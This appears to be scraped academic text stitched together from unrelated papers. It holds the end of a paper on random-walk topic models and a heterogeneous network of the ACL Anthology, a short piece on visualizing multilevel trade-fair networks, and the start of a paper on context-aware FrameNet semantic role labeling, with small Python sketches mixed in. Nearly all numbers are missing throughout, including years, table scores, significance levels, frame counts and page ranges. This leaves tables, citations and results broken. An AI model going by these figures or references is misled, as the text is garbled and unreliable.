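# Illustrative sketch of the topic coherence metric: for the top M words of a
# topic, sum log((D(v_m, v_l) + 1) / D(v_l)) over ordered pairs, where D
# counts (co-)document frequencies.  Documents and topic words are toy data.

import math
from typing import List, Set

def coherence(top_words: List[str], docs: List[Set[str]]) -> float:
    def d(*words):  # number of documents containing all the given words
        return sum(all(w in doc for w in words) for doc in docs)
    score = 0.0
    for m in range(1, len(top_words)):
        for l in range(m):
            v_m, v_l = top_words[m], top_words[l]
            score += math.log((d(v_m, v_l) + 1) / d(v_l))
    return score

docs = [{"parsing", "dependency"}, {"parsing", "grammar"},
        {"translation", "statistical"}, {"translation", "parsing"}]
print(coherence(["parsing", "dependency", "grammar"], docs))
```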
performance of these methods is summarized in table . the co-occurence-based random walk topic model performed comparably with the best per- former at this task, lda, and there was no signifi- cant difference between the two at p < . . going forward, an important problem is to rec- oncile the co-occurence- and word-similarity-based formulations of this topic model, as the two formu- lations perform very differently in our two evalua- tions. heuristically, the co-occurence model seems to create good human-readable topics, while the word-similarity model creates topics that are more mathematically-coherent, but less human-readable. related work heterogeneous networks have been studied in a number of different fields, such as biology (sio- son, ), transportation networks (lozano and method dcg word vector . ± . lda . ± . rtm . ± . random-walk (cooc) . ± . random-walk (sim) . ± . table : dcg performance of the various topic models and baselines on the related document find- ing task. a % confidence interval is provided. storchi, ), social networks (lambiotte and aus- loos, ), and bibliographic networks (sun et al., ). these networks are also sometimes known by the name complex networks or multimodal net- works, but both these terms have other connotations. we prefer “heterogeneous networks” as used by sun et al. ( ). there has also been some study of these networks in general, in community detection (murata, ), clustering (long et al., ; sun et al., ), and data mining (muthukrishnan et al., ), but there has not yet been any comprehensive study. recently, nlp has seen several uses of heterogeneous net- works (though not by that name) for use with label propagation algorithms (das and petrov, ; spe- riosu et al., ) and random walks (toutanova et al., ; kok and brockett, ). several authors have proposed the idea of using network centrality measures to rank the impacts of journals, authors, papers, etc. (bollen et al., ; bergstrom et al., ; chen et al., ; liu et al., ), and it has even been proposed that central- ity can be applicable in bipartite networks (zhou et al., ). we propose that pagerank on any gen- eral heterogeneous network is appropriate for creat- ing ranked lists for each type of entity. most previ- ous papers also lack a robust evaluation, demonstrat- ing agreement with previous methods or with some external awards or recognitions. we use a random graph that replicates the properties of the real-world network to show that pagerank on the heterogeneous network outperforms other methods. name disambiguation has been studied in a num- ber of different settings, including graph-based set- tings. it is common to use the coauthorship graph (kang et al., ; fan et al., ), but authors have also used lexical similarity graphs (on and lee, ), citation graphs (mcrae-spencer and shad- bolt, ), or social networks (malin, ). al- most all graph methods are unsupervised. there have been some topic models developed specifically for relational data (wang et al., ; airoldi et al., ), but both of these models have limitations in the types of relational data they are able to model. the group topic model described in (wang et al., ) is able to create stronger topics by considering associations between words, events, and entities, but is very coarse in the way it han- dles the behavior of entities, and does not generalize to multiple different types of entities. 
the stochas- tic blockmodel of (airoldi et al., ) can create blocks of similar entities in a graph and is general in the types of graphs it can handle, but produces less meaningful results on graphs that have specific schemas. conclusion and future directions in this paper, we present a heterogeneous net- work treatment of the acl anthology network and demonstrate several applications of it. using only off-the-shelf graph algorithms with a single data rep- resentation, the heterogeneous aan, we are able to very easily build a scientific impact measure that is more accurate than existing measures, an author dis- ambiguation system better than existing graph-based author disambiguation systems, and a random-walk- based topic model that is competitive with statistical topic models. while there are many other tasks, such as citation- based summarization, that could likely be ap- proached using this framework with the appropri- ate addition of new types of nodes into the hetero- geneous aan network, there are even some poten- tial synergies between the tasks described in this pa- per that have yet to be explored. for example, we may consider that the methods of the author disam- biguation or topic modeling tasks could be to find the highest-impact papers associated with a term (for survey generation, perhaps) or high-impact authors associated with a workshop’s topic (to select good reviewers for it). we believe that heterogeneous graphs are a flexible framework that will allow re- searchers to find simple, flexible solutions for a va- riety of problems. acknowledgments this research is supported by the intelligence advanced research projects activity (iarpa) via department of interior national business center (doi/nbc) contract number d pc . the u.s. government is autho- rized to reproduce and distribute reprints for governmen- tal purposes notwithstanding any copyright annotation thereon. disclaimer: the views and conclusions con- tained herein are those of the authors and should not be interpreted as necessarily representing the official poli- cies or endorsements, either expressed or implied, of iarpa, doi/nbc, or the u.s. government. references edoardo m. airoldi, david m. blei, stephen e. fienberg, and eric p. xing. . mixed membership stochastic blockmodels. the journal of machine learning re- search, : – . réka albert and albert-lászló barabási. . statisti- cal mechanics of complex networks. reviews of mod- ern physics, ( ): . a.l. barabási and r. albert. . emergence of scal- ing in random networks. science, ( ): – . carl t. bergstrom, jevin d. west, and marc a. wiseman. . the eigenfactor metrics. the journal of neuro- science, ( ): – . steven bird, robert dale, bonnie j dorr, bryan gib- son, mark joseph, min-yen kan, dongwon lee, brett powley, dragomir r radev, and yee fan tan. . the acl anthology reference corpus: a reference dataset for bibliographic research in computational lin- guistics. in proc. of the th international conference on language resources and evaluation conference (lrec ), pages – . d.m. blei, a.y. ng, and m.i. jordan. . latent dirichlet allocation. the journal of machine learning research, : – . johan bollen, marko a. rodriguez, and herbert van de sompel. . journal status. corr, abs/cs/ . johan bollen, herbert van de sompel, aric hagberg, and ryan chute. . a principal component analysis of scientific impact measures. plos one, ( ):e . tibor braun, wolfgang glänzel, and andrás schubert. . a hirsch-type index for journals. scientomet- rics, ( ): – . 
jonathan chang and david m blei. . hierarchical relational models for document networks. the annals of applied statistics, ( ): – . peng chen, huafeng xie, sergei maslov, and sid redner. . finding scientific gems with googles pagerank algorithm. journal of informetrics, ( ): – . aaron clauset, cosma rohilla shalizi, and mark ej newman. . power-law distributions in empirical data. siam review, ( ): – . dipanjan das and slav petrov. . unsupervised part- of-speech tagging with bilingual graph-based projec- tions. in proceedings of the th annual meeting of the association for computational linguistics: hu- man language technologies, pages – . paul erdős and alfréd rényi. . on the evolution of random graphs. magyar tud. akad. mat. kutató int. közl, : – . günes erkan and dragomir r. radev. . lexrank: graph-based lexical centrality as salience in text sum- marization. j. artif. intell. res. (jair), : – . xiaoming fan, jianyong wang, xu pu, lizhu zhou, and bing lv. . on graph-based name disambigua- tion. j. data and information quality, ( ): : – : , february. william a. gale, kenneth w. church, and david yarowsky. . work on statistical methods for word sense disambiguation. in working notes of the aaai fall symposium on probabilistic approaches to natu- ral language, volume , page . david hall, daniel jurafsky, and christopher d. man- ning. . studying the history of ideas using topic models. in proceedings of the conference on empir- ical methods in natural language processing, pages – . acl. ahmed hassan, amjad abu-jbara, and dragomir radev. . extracting signed social networks from text. textgraphs- , page . jorge e. hirsch. . an index to quantify an indi- vidual’s scientific research output. proceedings of the national academy of sciences of the united states of america, ( ): . thomas hofmann. . probabilistic latent semantic indexing. in proceedings of the nd annual interna- tional acm sigir conference on research and devel- opment in information retrieval, pages – . acm. kalervo järvelin and jaana kekäläinen. . ir evalua- tion methods for retrieving highly relevant documents. in proceedings of the rd annual international acm sigir conference on research and development in in- formation retrieval, pages – . acm. in-su kang, seung-hoon na, seungwoo lee, hanmin jung, pyung kim, won-kyung sung, and jong-hyeok lee. . on co-authorship for author disam- biguation. information processing & management, ( ): – . brian karrer and mark ej newman. . stochas- tic blockmodels and community structure in networks. physical review e, ( ): . stanley kok and chris brockett. . hitting the right paraphrases in good time. in human language tech- nologies: the annual conference of the north american chapter of the association for computa- tional linguistics, pages – . acl. oren kurland and lillian lee. . pagerank without hyperlinks: structural reranking using links induced by language models. in sigir ’ . renaud lambiotte and marcel ausloos. . collabo- rative tagging as a tripartite network. computational science–iccs , pages – . david liben-nowell and jon kleinberg. . the link- prediction problem for social networks. journal of the american society for information science and technol- ogy, ( ): – . r.n. lichtenwalter, j.t. lussier, and n.v. chawla. . new perspectives and methods in link prediction. in proceedings of the th acm sigkdd international conference on knowledge discovery and data mining, pages – . acm. xiaoming liu, johan bollen, michael l. nelson, and herbert van de sompel. . 
co-authorship net- works in the digital library research community. infor- mation processing & management, ( ): – . bo long, zhongfei zhang, and tianbing xu. . clustering on complex graphs. in proc. the rd conf. aaai . angelica lozano and giovanni storchi. . shortest viable hyperpath in multimodal networks. transporta- tion research part b: methodological, ( ): – . bradley malin. . unsupervised name disambigua- tion via social network similarity. in workshop on link analysis, counterterrorism, and security, vol- ume , pages – . sergei maslov and sidney redner. . promise and pitfalls of extending google’s pagerank algorithm to citation networks. the journal of neuroscience, ( ): – . ryan mcdonald, fernando pereira, kiril ribarov, and jan hajič. . non-projective dependency pars- ing using spanning tree algorithms. in proceedings of the conference on human language technology and empirical methods in natural language processing, pages – . acl. duncan m. mcrae-spencer and nigel r. shadbolt. . also by the same author: aktiveauthor, a cita- tion graph approach to name disambiguation. in pro- ceedings of the th acm/ieee-cs joint conference on digital libraries, pages – . acm. rada mihalcea and paul tarau. . textrank: bring- ing order into texts. in proceedings of emnlp, vol- ume , pages – . barcelona, spain. rada mihalcea. . unsupervised large-vocabulary word sense disambiguation with graph-based algo- rithms for sequence data labeling. in proceedings of hlt-emnlp, pages – . acl. david mimno, hanna m. wallach, edmund talley, miriam leenders, and andrew mccallum. . op- timizing semantic coherence in topic models. in pro- ceedings of the conference on empirical methods in natural language processing, pages – . acl. panchanan mitra. . hirsch-type indices for rank- ing institutions scientific research output. current sci- ence, ( ): . tsuyoshi murata. . detecting communities from tripartite networks. in proceedings of the th inter- national conference on world wide web, pages – . acm. pradeep muthukrishnan, dragomir radev, and qiaozhu mei. . edge weight regularization over mul- tiple graphs for similarity learning. in data mining (icdm), ieee th international conference on, pages – . ieee. mark e.j. newman and juyong park. . why social networks are different from other types of networks. physical review e, ( ): . byung-won on and dongwon lee. . scalable name disambiguation using multi-level graph partition. in proceedings of the th siam international conference on data mining, pages – . lawrence page, sergey brin, rajeev motwani, and terry winograd. . the pagerank citation ranking: bringing order to the web. romualdo pastor-satorras and alessandro vespignani. . epidemic spreading in scale-free networks. physical review letters, ( ): – . dragomir r. radev, pradeep muthukrishnan, vahed qazvinian, and amjad abu-jbara. . the acl anthology network corpus. language resources and evaluation, pages – . william m. rand. . objective criteria for the eval- uation of clustering methods. journal of the american statistical association, ( ): – . s. redner. . how popular is your paper? an empir- ical study of the citation distribution. the european physical journal b-condensed matter and complex systems, ( ): – . p. sarkar, a.w. moore, and a. prakash. . fast incre- mental proximity search in large graphs. in proceed- ings of the th international conference on machine learning, pages – . acm. allan a. sioson. . multimodal networks in biology. ph.d. thesis, virginia polytechnic institute and state university. 
michael speriosu, nikita sudan, sid upadhyay, and jason baldridge. . twitter polarity classification with label propagation over lexical links and the follower graph. in proceedings of the first workshop on unsupervised learning in nlp, pages – , edinburgh, scotland, july. acl. alexander strehl and joydeep ghosh. . cluster ensembles—a knowledge reuse framework for combining multiple partitions. the journal of machine learning research, : – . yizhou sun, jiawei han, peixiang zhao, zhijun yin, hong cheng, and tianyi wu. . rankclus: integrating clustering with ranking for heterogeneous information network analysis. in proceedings of the th international conference on extending database technology: advances in database technology, pages – . acm. yizhou sun, rick barber, manish gupta, and jiawei han. . co-author relationship prediction in heterogeneous bibliographic networks. yizhou sun, charu c. aggarwal, and jiawei han. . relation strength-aware clustering of heterogeneous information networks with incomplete attributes. proceedings of the vldb endowment, ( ): – . ben taskar, ming-fai wong, pieter abbeel, and daphne koller. . link prediction in relational data. in neural information processing systems, volume . robert tibshirani, guenther walther, and trevor hastie. . estimating the number of clusters in a data set via the gap statistic. journal of the royal statistical society: series b (statistical methodology), ( ): – . kristina toutanova, christopher d. manning, and andrew y. ng. . learning random walk models for inducing word dependency distributions. in proceedings of the twenty-first international conference on machine learning, page . acm. xuerui wang, natasha mohanty, and andrew mccallum. . group and topic discovery from relations and their attributes. technical report, dtic document. kai yu, shipeng yu, and volker tresp. . soft clustering on graphs. advances in neural information processing systems, : . ding zhou, sergey a. orshanskiy, hongyuan zha, and c. lee giles. . co-ranking authors and documents in a heterogeneous network. in data mining, . icdm . seventh ieee international conference on, pages – . ieee.

connections issue | vol. article | doi: . /connections- .

visualizing multilevel networks for the analysis of superposed levels of collective agency
emmanuel lazega*
sciences po paris, iuf centre de sociologie des organisations, france. *e-mail: emmanuel.lazega@sciencespo.fr

abstract this picture, produced by julien brailly et al. ( ) and david schoch ( ), visualizes multilevel networks of individuals and organizations.
keywords multilevel networks, image.

the upper level this is the inter-organizational network in which the ties are economic relationships (business deals) signed at time t between companies (the nodes). the pattern represents a core-periphery structure. in the core, the more central companies (the majors of this industry and a few other smaller companies that managed to sign a contract with the majors) drive the economic action (contracting). the periphery is composed of many small companies (the nodes on the outer upper circle) that did not sign any contract that year and thus find themselves isolated, as if they were watching the action from a balcony.
the lower level this is the inter-individual level in which the ties are informal discussion and personal information gathering at time t− between these individuals. the high density of this lower, inter-individual network represents the fact that members of competing companies talk to each other actively. vertical ties these ties between nodes from the lower level and nodes at the upper level are affiliation ties of each individual in their organizations. the empirical setting this multilevel network was measured in the largest trade fair for television programs in eastern europe. in this trade fair, nodes at the upper level are companies and institutions of the global and regional television industry. they sell, buy, distribute programs, and regulate the industry. color codes at this upper level represent the organizations composing the value chain in , for example broadcasters in blue, distributors in green, independent buyers in purple, media groups in yellow, producers in brown. nodes at the lower level are mainly individual sales representatives, sellers and buyers of tv programs meeting at this trade fair to keep abreast of new films, series and game shows, to observe market trends and evolutions, and to discuss contracts in . sellers mainly from the usa and western europe come to pitch and sell their audiovisual products to regional and local buyers such as the broadcasting companies (television channels for example). the density of this inter-individual network represents the “buzz” network between these sales representatives in this trade fair, emphasizing the crucial role of cooperation among interdependent competitors (lazega and mounier, ; lazega et al., ; lazega, ) as a multilevel phenomenon. for a substantive explanation of this graph, see brailly ( ). sociological interpretation from an economic sociology perspective, such pat- terns facilitate the study of multilevel, multiplex and multisided overlaps across levels, to provide a new perspective on markets as multilevel networks. in these multilevel networks, a relationship between two firms creates a context that facilitates the creation or maintenance of relationships between their em- ployees, and the other way around: interpersonal relation ships between sales representatives contri- bute to the formation of inter-organizational, con- tracting ties (bathelt and glückler, ; berends et al., ). in this context, social relationships are not only behind the deals, they are also around them. in other words, social relationships are not only between buyers and sellers, but also among buyers and among sellers. as a result, such relationships need to be contextualized in their relational neighborhood. for example, imagine the following hypothetical scenario: seller a can give an opportunity to seller b concerning a buyer c such as “c is looking for products you have.” seller a gives this opportunity to seller b only because they are “friends” and they have known each other for a long time, expecting direct reciprocity. this opportunity is relevant because seller a’s company has already closed a deal with buyer c’s company and so seller a is aware of buyer c’s needs and bargaining behavior. this situation leads to the creation of a new relationship between seller b and buyer c in the form of a meeting to discuss a potential deal. this complex pattern helps redefine the nature of markets (brailly et al., ) as multilevel, socially organized settings. 
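the two-level structure described here, an inter-organizational contract network, an inter-individual discussion network, and affiliation ties linking the two, can be represented with standard graph tooling. the sketch below is a minimal, hypothetical construction using networkx; the node names and ties are invented for illustration and do not come from the trade-fair data.

```python
import networkx as nx

# one graph holding both levels; a "level" attribute distinguishes node types
g = nx.Graph()

# upper level: organizations and the deals (contract ties) between them
orgs = ["broadcaster_a", "distributor_b", "producer_c"]
g.add_nodes_from(orgs, level="organization")
g.add_edge("distributor_b", "broadcaster_a", tie="deal")   # inter-organizational tie

# lower level: individual sales representatives and their discussion ties
people = ["rep_1", "rep_2", "rep_3"]
g.add_nodes_from(people, level="individual")
g.add_edge("rep_1", "rep_2", tie="discussion")             # inter-individual tie

# vertical ties: affiliation of each individual to their organization
g.add_edge("rep_1", "distributor_b", tie="affiliation")
g.add_edge("rep_2", "broadcaster_a", tie="affiliation")
g.add_edge("rep_3", "producer_c", tie="affiliation")

# e.g., project the lower level onto the upper one: two organizations are
# linked if their affiliated representatives talk to each other
upper_projection = set()
for u, v, d in g.edges(data=True):
    if d["tie"] == "discussion":
        org_u = [n for n in g[u] if g.edges[u, n]["tie"] == "affiliation"]
        org_v = [n for n in g[v] if g.edges[v, n]["tie"] == "affiliation"]
        upper_projection.update((a, b) for a in org_u for b in org_v)
print(upper_projection)
```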
in this specific setting, a limited number of very large companies dominate the market with smaller companies gravitating around this core, suggesting an oligopolistic structure that economists call “oligopoly with fringes.” trade fairs as field- configuring events contribute to the reproduction of this oligopolistic, multilevel and coopetitive structure. in the sociology of culture, it helps understand, from a neo-structural perspective, the mechanisms under- lying contemporary globalization and uniformization of culture (brailly et al., ; favre et al., ). methodological foundations and extensions for a general perspective on multilevel networks in the social sciences, see snijders ( ). multilevel blockmodels and stochastic blockmodels for such data are available in Žiberna ( ), barbillon et al. ( ) and chabert-liddell et al. ( ). for multilevel ergms associated with this data format, see wang et al. ( ). for multilevel ergms ana lyzing this dataset, see brailly ( ) brailly et al. ( ) and favre et al. ( ). for more methods using multilevel connections network analyses, see various chapters in lazega and snijders ( ), lomi et al. ( ), koskinen et al. ( ), tranmer et al. ( ). references barbillon, p., donnet, s., lazega, e. and bar-hen, a. . stochastic block-models for multiplex networks: an application to a multilevel network of researchers. journal of the royal statistical society: series a (statistics in society) : – . bathelt, h. and glückler, j. . toward a relational economic geography. journal of economic geography : – . berends, h., van burg, e. and van raaij, e. m. . contacts and contracts: crosslevel network dynamics in the development of an aircraft material. organization science : – . brailly, j. . dynamics of networks in trade fairs—a multilevel relational approach to the cooperation among competitors. journal of economic geography : – . brailly, j., favre, g., chatellet, j. and lazega, e. . embeddedness as a multilevel problem: a case study in economic sociology. social networks : – . chabert-liddell, s. c., barbillon, p., donnet, s. and lazega, e. . a stochastic block model for multilevel networks: application to the sociology of organisations. arxiv preprint arxiv: . (accessed december , ). favre, g., brailly, j., chatellet, j. and lazega, e. . “inter-organizational network influence on long term and short term inter-individual relationships: the case of a trade fair for tv programs distribution in sub-saharan africa”, in lazega, e. and snijders, t. a. b. (eds), multilevel network analysis for the social sciences springer, dordrecht. koskinen, j., broccatelli, c., wang, p. and robins, g. . “bayesian analysis of erg models for multilevel, multiplex, and multilayered networks with sampled or missing data”, convegno della società italiana di statistica springer, cham, pp. – . lazega, e. . bureaucracy, collegiality and social change: redefining organizations with multilevel relational infrastructures edward elgar publishing, cheltenham. lazega, e. and mounier, l. . “interdependent entrepreneurs and the social discipline of their cooperation: the research program of structural economic sociology for a society of organizations”, in favereau, o. and lazega, e. (eds), conventions and structures in economic organization: markets, networks, and hierarchies edward elgar publishing, cheltenham, pp. – . lazega, e. and snijders, t. a. b. . “the multiple flavours of multilevel issues for networks”, in lazega, e. and snijders, t. a. b. 
multilevel network analysis for the social sciences springer, cham, pp. – . lazega, e., jourda, m.-t., mounier, l. and stofer, r. . catching up with big fish in the big pond? multi-level network analysis through linked design. social networks : – . lomi, a., robins, g. and tranmer, m. . "introduction to multilevel social networks", social networks, : – . schoch, d. . visualizing multilevel networks with graphlayouts, available at: http://blog.schochastics.net/post/visualizing-multilevel-networks-with-graphlayouts/ (accessed december , ). tranmer, m., pallotti, f. and lomi, a. . "the embeddedness of organizational performance: multiple membership multiple classification models for the analysis of multilevel networks", social networks, : – . wang, p., robins, g. l., pattison, p. e. and lazega, e. . exponential random graph models for multilevel networks. social networks : – . Žiberna, a. . blockmodeling of multilevel networks. social networks : – .

context-aware frame-semantic role labeling
michael roth and mirella lapata
school of informatics, university of edinburgh, crichton street, edinburgh eh ab
{mroth,mlap}@inf.ed.ac.uk
published in: transactions of the association for computational linguistics, vol. , pp. - . <https://tacl .cs.columbia.edu/ojs/index.php/tacl/article/view/ >

abstract frame semantic representations have been useful in several applications ranging from text-to-scene generation, to question answering and social network analysis. predicting such representations from raw text is, however, a challenging task and corresponding models are typically only trained on a small set of sentence-level annotations. in this paper, we present a semantic role labeling system that takes into account sentence and discourse context. we introduce several new features which we motivate based on linguistic insights and experimentally demonstrate that they lead to significant improvements over the current state-of-the-art in framenet-based semantic role labeling.

introduction the goal of semantic role labeling (srl) is to identify and label the arguments of semantic predicates in a sentence according to a set of predefined relations (e.g., "who" did "what" to "whom").
in addition to providing definitions and examples of role labeled text, resources like framenet (ruppenhofer et al., ) group semantic predicates into so-called frames, i.e., conceptual structures describing the background knowledge necessary to understand a situation, event or entity as a whole as well as the roles participating in it. accordingly, semantic roles are defined on a per-frame basis and are shared among predicates. in recent years, frame representations have been successfully applied in a range of downstream tasks, including question answering (shen and lapata, ), text-to-scene generation (coyne et al., ), stock price prediction (xie et al., ), and social network extraction (agarwal et al., ). whereas some tasks directly utilize information encoded in the framenet resource, others make use of framenet indirectly through the output of srl systems that are trained on data annotated with frame-semantic representations. while advances in machine learning have recently given rise to increasingly powerful srl systems following the framenet paradigm (hermann et al., ; täckström et al., ), little effort has been devoted to improve such models from a linguistic perspective. in this paper, we explore insights from the linguistic literature suggesting a connection between discourse and role labeling decisions and show how to incorporate these in an srl system. although early theoretical work (fillmore, ) has recognized the importance of discourse context for the assignment of semantic roles, most computational approaches have shied away from such considerations. to see how context can be useful, consider as an example the delivery frame, which states that a theme can be handed off to either a recipient or "more indirectly" to a goal. while the distinction between the latter two roles might be clear for some fillers (e.g., people vs. locations), there are others where both roles are equally plausible and additional information is required to resolve the ambiguity (e.g., countries). if we hear about a letter being delivered to greece, for instance, reliable cues might be whether the sender is a person or a country and whether greece refers to the geographic region or to the greek government. the example shows that context can generally influence the choice of correct role label. accordingly, we assume that modeling contextual information, such as the meaning of a word in a given situation, can improve semantic role labeling performance. to validate this assumption, we explore different ways of incorporating contextual cues in an srl model and provide experimental support that demonstrates the usefulness of such additional information. the remainder of this paper is structured as follows. in section , we present related work on semantic role labeling and the various features applied in traditional srl systems. in section , we provide additional background on the framenet resource. sections and describe our baseline system and contextual extensions, respectively, and section presents our experimental results. we conclude the paper by discussing in more detail the output of our system and highlighting avenues for future work.
related work early work in srl dates back to gildea and juraf- sky ( ), who were the first to model role assign- ment to verb arguments based on framenet. their model makes use of lexical and syntactic features, including binary indicators for the words involved, syntactic categories, dependency paths as well as po- sition and voice in a given sentence. most subse- quent work in srl builds on gildea and jurafsky’s feature set, often with the addition of features that describe relevant syntactic structures in more de- tail, e.g., the argument’s leftmost/rightmost depen- dent (johansson and nugues, ). more sophisticated features include the use of convolution kernels (moschitti, ; croce et al., ) in order to represent predicate-argument structures and their lexical similarities more accu- rately. beyond lexical and syntactic information, a few approaches employ additional semantic fea- tures based on annotated word senses (che et al., ) and selectional preferences (zapirain et al., ). deschacht and moens ( ) and huang and yates ( ) use sentence-internal sequence in- formation, in the form of latent states in a hidden markov model. more recently, a few approaches (roth and woodsend, ; lei et al., ; foland and martin, ) explore ways of using low-rank vector and tensor approximations to represent lex- ical and syntactic features as well as combinations thereof. to the best of our knowledge, there exists no prior work where features based on discourse con- text are used to assign roles on the sentence level. discourse-like features have been previously ap- plied in models that deal with so-called implicit ar- guments, i.e., roles which are not locally realized but resolvable within the greater discourse context (ruppenhofer et al., ; gerber and chai, ). successful features for resolving implicit arguments include the distance between mentions and any dis- course relations occurring between them (gerber and chai, ), roles assigned to mentions in the previous context, the discourse prominence of the denoted entity (silberer and frank, ), and its centering status (laparra and rigau, ). none of these features have been used in a standard srl system to date (and trivially, not all of them will be helpful as, for example, the number of sentences be- tween a predicate and an argument is always zero within a sentence). in this paper, we extend the contextual features used for resolving implicit ar- guments to the srl task and show how a set of discourse-level enhancements can be added to a tra- ditional sentence-level srl model. framenet the berkeley framenet project (ruppenhofer et al., ) develops a semantic lexicon and an annotated example corpus based on fillmore’s ( ) theory of frame semantics. annotations consist of frame- evoking elements (i.e., words in a sentence that are associated with a conceptual frame) and frame ele- ments (i.e., instantiations of semantic roles, which are defined per frame and filled by words or word sequences in a given sentence). for example, the delivery frame describes a scene or situation in which a deliverer hands off a theme to a re- cipient or a goal. in total, there are , frames and , frame elements defined in the lat- see https://framenet .icsi.berkeley.edu/ for a comprehensive list of frames and their definitions. est publicly available version of framenet. an av- erage number of . different frame-evoking ele- ments are provided for each frame ( , in total). 
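for readers who want to inspect these frame definitions programmatically, the framenet data can be browsed through the nltk corpus reader. the sketch below is only an illustrative example: it assumes the framenet corpus has been downloaded locally, the download identifier and attribute names follow the nltk releases we are aware of, and the exact frame element inventory printed will depend on the framenet version used.

```python
import nltk
from nltk.corpus import framenet as fn

# one-time download of the framenet data bundled with nltk
# (identifier assumed here; it may differ across nltk versions)
nltk.download("framenet_v17")

# look up the delivery frame discussed above and list its frame elements
frame = fn.frame("Delivery")
print(frame.name)
print(frame.definition[:120])
for fe_name, fe in frame.FE.items():
    # coreType distinguishes core roles (e.g., theme) from peripheral ones
    print(fe_name, fe.coreType)

# lexical units are the frame-evoking elements associated with the frame
print(sorted(frame.lexUnit.keys()))
```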
following previous work on framenet-based srl, we use the full text annotation data set, which con- tains , frame instances. semantic annotations for frame instances and fillers of frame elements are generally provided at the level of word sequences, which can be single words, complete or incomplete phrases, and entire clauses (ruppenhofer et al., , chapter ). an instance of the delivery frame, with annotations of the frame-evoking element (underlined) and in- stantiated frame elements (in brackets), is given in the example below: ( ) the soviet union agreed to speed up [oil]theme deliveriesdelivery [to yugoslavia]recipient . note that the oil deliveries here concern yugoslavia as a geopolitical entity and hence the recipient role is assigned. if yugoslavia was referred to as the location of a delivery, the goal role would be assigned instead. in general, roles can be restricted by so-called semantic types (e.g., every filler of the theme element in the delivery frame needs to be a physical object). however, not all roles are typed and whether a specific phrase is a suitable filler largely depends on context. baseline model as a baseline for implementing contextual enhance- ments to an srl model, we use the semantic role labeling components provided by the mate-tools (björkelund et al., ). given a frame-evoking el- ement in a sentence and its associated frame (i.e., a predicate and its sense), the mate-tools form a pipeline of logistic regression classifiers that iden- tify and label frame elements which are instantiated within the same sentence (i.e., a given predicate’s arguments). the adopted srl system has been developed for propbank/nombank-style role labeling and we make several changes to adapt it to framenet. specifically, we change the argument labeling pro- cedure from predicate-specific to frame-specific version . , released september . roles and implement i/o methods to read and gen- erate framenet xml files. for direct compari- son with the previous state-of-the-art for framenet- based srl, we further implement additional fea- tures used in the semafor system (das et al., ) and combine the role labeling compo- nents of mate-tools with semafor’s preprocess- ing toolchain. all features used in our system are listed in table . the main differences between our adaptation of mate-tools and semafor are as follows: whereas the latter implements identification and labeling of role fillers in one step, mate-tools follow the in- sight that these two steps are conceptually differ- ent (xue and palmer, ) and should be modeled separately. accordingly, mate-tools contain a global reranking component which takes into account iden- tification and labeling decisions while semafor only uses reranking techniques to filter overlapping argument predictions and other constraints (see das et al., for details). we discuss the advantage of a global reranker for our setting in section . extensions based on context context can be relevant for semantic role labeling in various different ways. in this section, we moti- vate and describe four extensions over previous ap- proaches. the first extension is a set of features that model document-specific aspects of word meaning using distributional semantics. the motivation for this fea- ture class stems from the insight that the meaning of a word in context can influence correct role assign- ment. 
while concepts such as polysemy, homonymy and metonymy are all relevant here, the scarce train- ing data available for framenet-based srl calls for a light-weight model that can be applied without large amounts of labeled data. we therefore employ distributional word representations which we criti- cally adapt based on document content. we describe our contribution in section . . entities that fill semantic roles are sometimes mentioned in discourse. given a specific mention we note that better results have been reported in hermann et al. ( ) and täckström et al. ( ). however, both of these more recent approaches rely on a custom frame identifi- cation component as well as proprietary tools and models for tagging and parsing which are not publicly available. argument identification and classification lemma form of f pos tag of f any syntactic dependents of f* subcat frame of f* voice of a* any lemma in a* number of words in a first word and pos tag in a second word and pos tag in a last word and pos tag in a relation from first word in a to its parent relation from second word in a to its parent relation from last word in a to its parent relative position of a with respect to p voice of a and relative position with respect to p* identification only lemma form of the first word in a lemma form of the syntactic head of a lemma form of the last word in a pos tag of the first word in a pos tag of the syntactic head of a pos tag of the last word in a relation from syntactic head of a to its parent dependency path from a to f length of dependency path from a to f number of words between a and f table : features from das et al. ( ) which we adopt in our model; a denotes the argument span under con- sideration, f refers to the corresponding frame evoking element. identification features are instantiated as binary indicator features. features marked with an asterisk are role specific. all other features apply to combinations of role and frame. for which a role is to be predicted, we can also di- rectly use previous role assignments as classification cues. we describe our implementation of this feature in section . . the filler of a semantic role is often a word or phrase which occurs only once or a few times in a document. if neither syntax nor aspects of lexi- cal meaning provide cues indicating a unique role, useful information can still be derived from the dis- course salience of the denoted entity. our model makes use of a simple salience indicator that can be reliably derived from automatically computed coref- erence chains. we describe the motivation and ac- tual implementation of this feature in section . . the aforementioned features will influence role labeling decisions directly, however, further im- provements can be gained by considering interac- tions between labeling decisions. as discussed in das et al. ( ), role annotations in framenet are unique with respect to a frame instance in more than % of cases. this means that even if a feature is not a positive indicator for a candidate role filler, knowing it would be a better cue for another can- didate can also prevent a hypothetical model from assigning a frame element label incorrectly. 
while this kind of knowledge has been successfully im- plemented as constraints in recent framenet-based srl models (hermann et al., ; täckström et al., ), earlier work on propbank-based role label- ing suggests that better performance can be achieved with a re-ranking component which has the poten- tial to learn such constraints and other interactions implicitly (toutanova et al., ; björkelund et al., ). in our model, we adopt the latter method and extend it with additional frame-based features. we describe this approach in more detail in section . . . modeling word meaning in context the underlying idea of distributional models of se- mantics is that meaning can be acquired based on distributional properties (typically represented by co-occurrence counts) of linguistic entities such as words and phrases (sahlgren, ). although the absolute meaning of distributional representations remains unclear, they have proven highly success- ful for modeling relative aspects of meaning, as re- quired for instance in word similarity tasks (mikolov et al., ; pennington et al., ). given their ability to model lexical similarity, it is not surpris- ing that such representations are also successful at representing similar words in semantic tasks related to role labeling (pennacchiotti et al., ; croce et al., ; zapirain et al., ). although distributional representations can be used directly as features for role labeling (padó et al., ; gorinski et al., ; roth and wood- send, , inter alia), further gains should be possi- ble when considering document-specific properties such as genre and context. this is particularly true in the context of framenet, where different senses are observed across a diverse range of texts includ- ing spoken dialogue and debate transcripts as well country frame frame element iran supply recipient commerce buy buyer china supply supplier commerce sell seller iraq locative relation ground arriving goal table : most frequent roles assigned to country names appearing framenet texts: whereas iran and china are mostly mentioned in an economic context, references to iraq are mainly found in a news article about a politician’s visit to the country. as travel guides and newspaper articles. country names, for example, can be observed as fillers for different roles depending on the text genre and its perspective. whereas some text may talk about a country as an interesting holiday destination (e.g., “berlitz intro to jamaica”), others may discuss what a country is good at or interested in (e.g., “iran [nu- clear] introduction”). a list of the most frequent roles assigned to different country names are dis- played in table . previous approaches model word meaning in con- text (thater et al., 